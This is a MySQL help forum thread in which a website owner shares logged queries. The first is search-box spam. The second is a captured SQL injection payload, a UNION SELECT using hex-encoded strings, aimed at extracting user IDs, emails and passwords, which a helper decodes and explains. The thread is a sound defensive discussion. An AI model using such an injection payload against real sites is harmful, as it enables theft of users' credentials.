Jump to content

mysql_fetch_array(): Query

ben_1uk

By ben_1uk
in MySQL Help

 Share

Recommended Posts

ben_1uk Member

ben_1uk

Posted
Posted

Hi everyone,

 

I'm hoping someone far more knowledgeable than myself can help out with an issue that has started over the last couple of weeks.

 

I am receiving E-mails generated by my SQL database 'functions.php' file containing what looks to be the results of someone entering spurious search queries on one of my websites. I have included an example below:

 

SELECT p.page_title, p.page_url, COUNT(*) AS occurrences
	FROM search_page p, search_word w, search_occurrence o
	WHERE p.id = o.page AND w.id = o.word AND (w.word = 'xksvonbwfsnbudi' OR w.word = 'href=httpindianautoobservercomfemale' OR w.word = 'viagra' OR w.word = 'alternativea' OR w.word = 'wnwgpop' OR w.word = 'url=httpindianautoobservercomyang' OR w.word = 'mei' OR w.word = 'viagra' OR w.word = ''guangzhou'url' OR w.word = 'ehjwsjg' OR w.word = 'httpindianautoobservercom' OR w.word = 'viagra' OR w.word = 'prescription' OR w.word = 'jajfabw' OR w.word = 'href=httpwwwyaleacsorgbuy' OR w.word = 'viagra' OR w.word = 'interneta' OR w.word = 'hhjuxid' OR w.word = 'url=httpwwwyaleacsorghow' OR w.word = 'viagra' OR w.word = 'worksurl' OR w.word = 'kkwuvbc' OR w.word = 'httpwwwyaleacsorg' OR w.word = 'get' OR w.word = 'viagra' OR w.word = 'wxottqn' OR w.word = 'href=httpksign-mallcomwhat' OR w.word = 'metronidazole' OR w.word = 'used' OR w.word = 'for' OR w.word = 'dogsa' OR w.word = 'uthzket' OR w.word = 'url=httpksign-mallcommetronidazole' OR w.word = 'vaginal' OR w.word = 'gelurl' OR w.
 word = 'qajooff' OR w.word = 'httpksign-mallcom' OR w.word = 'metronidazole' OR w.word = 'dose' OR w.word = 'agdlvut' OR w.word = 'href=httpwwwmetacafecomchannelsjwannrichard' OR w.word = 'jeremiah' OR w.word = 'wanna' OR w.word = 'mpsswty' OR w.word = 'url=httpwwwmetacafecomchannelsjwannrichard' OR w.word = 'jeremiah' OR w.word = 'wannurl' OR w.word = 'qefwnsd' OR w.word = 'httpwwwmetacafecomchannelsjwann' OR w.word = 'richard' OR w.word = 'jeremiah' OR w.word = 'wann' OR w.word = 'svalyyw' OR w.word = 'href=httpgenf20-directcomgenf20' OR w.word = 'hgh' OR w.word = 'releasera' OR w.word = 'rttnfdx' OR w.word = 'url=httpgenf20-directcomgenf20url' OR w.word = 'egjipkc' OR w.word = 'httpgenf20-directcom' OR w.word = 'genf20' OR w.word = 'leading' OR w.word = 'edge' OR w.word = 'herbals' OR w.word = 'tlfsril' OR w.word = 'href=httphidecornetanyoption-reviewany' OR w.word = 'optiona' OR w.word = 'mvgfgum' OR w.word = 'url=httphidecornetanyoption-reviewanyoption' OR w.word = 'tra  dingurl' OR w.word = 'ovyjjoy' OR w.word = 'httphidecornetanyoption-review' OR w.word = 'anyoption' OR w.word = 'trading' OR w.word = 'vxwmsft')
    GROUP BY p.id
    ORDER BY occurrences DESC
	LIMIT 0 , 10

Can someone please explain what is going on here and, in layman's terms, what actions I need to take.

 

Many thanks in advance,

Ben1uk

Link to comment
Share on other sites
requinix Prolific Member

requinix

Posted
Posted (edited)

Looks like you strip out non-alphanumeric characters? Someone's botting your search page with spam, thinking it might be a kind of comment form or something.

 

Is it causing a problem? Something you can just ignore? They'll leave once they realize they're not accomplishing anything.

Edited by requinix
Link to comment
Share on other sites
ben_1uk Member

ben_1uk

Posted
  • Author
Posted

Looks like you strip out non-alphanumeric characters? Someone's botting your search page with spam, thinking it might be a kind of comment form or something.

 

Is it causing a problem? Something you can just ignore? They'll leave once they realize they're not accomplishing anything.

 

Hi requinix,

 

Thank you for the quick response. I've not had experience of anything like this before and having spoken to somebody else about this, they mentioned that the below was an attempt to pull data from the database using the 'SELECT' command???

 

My primary concern is somebody being able to gain access to my SQL data or change the website in any way, shape or form. However, you state above 'they'll leave once they realize they're not accomplishing anything'. Are you saying the 'attack' is not anything to worry about? It has caused me a few sleepless nights over the Easter hols!

 

Can you offer any more of an insight as to what is actually happening, or what the robot is attempting to achieve?

Link to comment
Share on other sites
requinix Prolific Member

requinix

Posted
Posted

I'm saying it's not an attack. Look at what's in the query.

href=httpindianautoobservercomfemale

url=httpindianautoobservercomyang

httpksign-mallcom

trading
That's HTML and BBCode and straight up URLs and spam terms. For spam. They're spamming. SQL injection will have keywords like "SELECT" or pieces like "1=1".
Link to comment
Share on other sites
ben_1uk Member

ben_1uk

Posted
  • Author
Posted

 

I'm saying it's not an attack. Look at what's in the query.

href=httpindianautoobservercomfemale
url=httpindianautoobservercomyang
httpksign-mallcom
trading
That's HTML and BBCode and straight up URLs and spam terms. For spam. They're spamming. SQL injection will have keywords like "SELECT" or pieces like "1=1".

 

Hi requinix,

Thanks again for your help and advise. However, the above example I posted originally did contain 'SELECT', but it doesn't appear to have been entered by the 'bot'. If I'm understanding it correctly (I'm new to PHP and SQL driven websites), the 'SELECT' command has been generated by the 'functions.php' file working on the database..?

 

So long as my SQL database isn't at risk from this 'attack'...

Link to comment
Share on other sites
requinix Prolific Member

requinix

Posted
Posted

...

 

What you posted is way too specific to be actual input from a user. Also doesn't make sense to enter search terms like that when you can run arbitrary SQL.

So that's the SQL generated by your site, which you are supposed to be familiar with, including information provided by the user. The spam information.

 

I can't know more about your site than you do but I can tell you with reasonable certainty that it was neither an attack nor was putting your site at risk.

 

With that said, go learn how your own site works.

Link to comment
Share on other sites
  • 8 months later...
ben_1uk Member

ben_1uk

Posted
  • Author
Posted

Hello again,

 

Following on from the above series of posts, I received a series of emails yesterday containing the below:

SELECT p.id as parentID, p.name as parentName, p.description,  p.logo as parentLogo, p.parent, p.active FROM com_catalogue_category p
              LEFT JOIN com_catalogue_category c ON (c.id = p.parent)
              WHERE p.id = '56' and 5=6 union select concat(0x5E252421,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),ifnull(`password`,0x4E554C4C),char(9),0x2A5B7D2F),2 from `maver_user`.`users`  where email like 0x25676F6F676C656D61696C2E25 limit 86,1  --  And '6'='6'

Can anyone please advise what is happening in the above example?

 

Thank you,

Ben_1uk

Link to comment
Share on other sites
requinix Prolific Member

requinix

Posted
Posted

0x... is a way of getting a string into SQL without needing quotes.

mysql> SELECT 0x5E252421, 0x4E554C4C, 0x2A5B7D2F, 0x25676F6F676C656D61696C2E25 ;
+------------+------------+------------+------------------------------+
| 0x5E252421 | 0x4E554C4C | 0x2A5B7D2F | 0x25676F6F676C656D61696C2E25 |
+------------+------------+------------+------------------------------+
| ^%$!       | NULL       | *[}/       | %googlemail.%                |
+------------+------------+------------+------------------------------+
What they're doing there is trying to get IDs, emails, and passwords from the maver_user.users table. It's failing for a couple reasons: the number of fields doesn't match the rest of the query (6 in the first half, 1 in the second), and you probably don't have that table.

 

The SQL injection is with the 56 in

WHERE p.id = '56'
Link to comment
Share on other sites
ben_1uk Member

ben_1uk

Posted
  • Author
Posted

0x... is a way of getting a string into SQL without needing quotes.

mysql> SELECT 0x5E252421, 0x4E554C4C, 0x2A5B7D2F, 0x25676F6F676C656D61696C2E25 ;
+------------+------------+------------+------------------------------+
| 0x5E252421 | 0x4E554C4C | 0x2A5B7D2F | 0x25676F6F676C656D61696C2E25 |
+------------+------------+------------+------------------------------+
| ^%$!       | NULL       | *[}/       | %googlemail.%                |
+------------+------------+------------+------------------------------+
What they're doing there is trying to get IDs, emails, and passwords from the maver_user.users table. It's failing for a couple reasons: the number of fields doesn't match the rest of the query (6 in the first half, 1 in the second), and you probably don't have that table.

 

The SQL injection is with the 56 in

WHERE p.id = '56'

Thank you for your response requinix,

 

Next question is what can I do to prevent this information falling into the wrong hands?

Link to comment
Share on other sites
This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.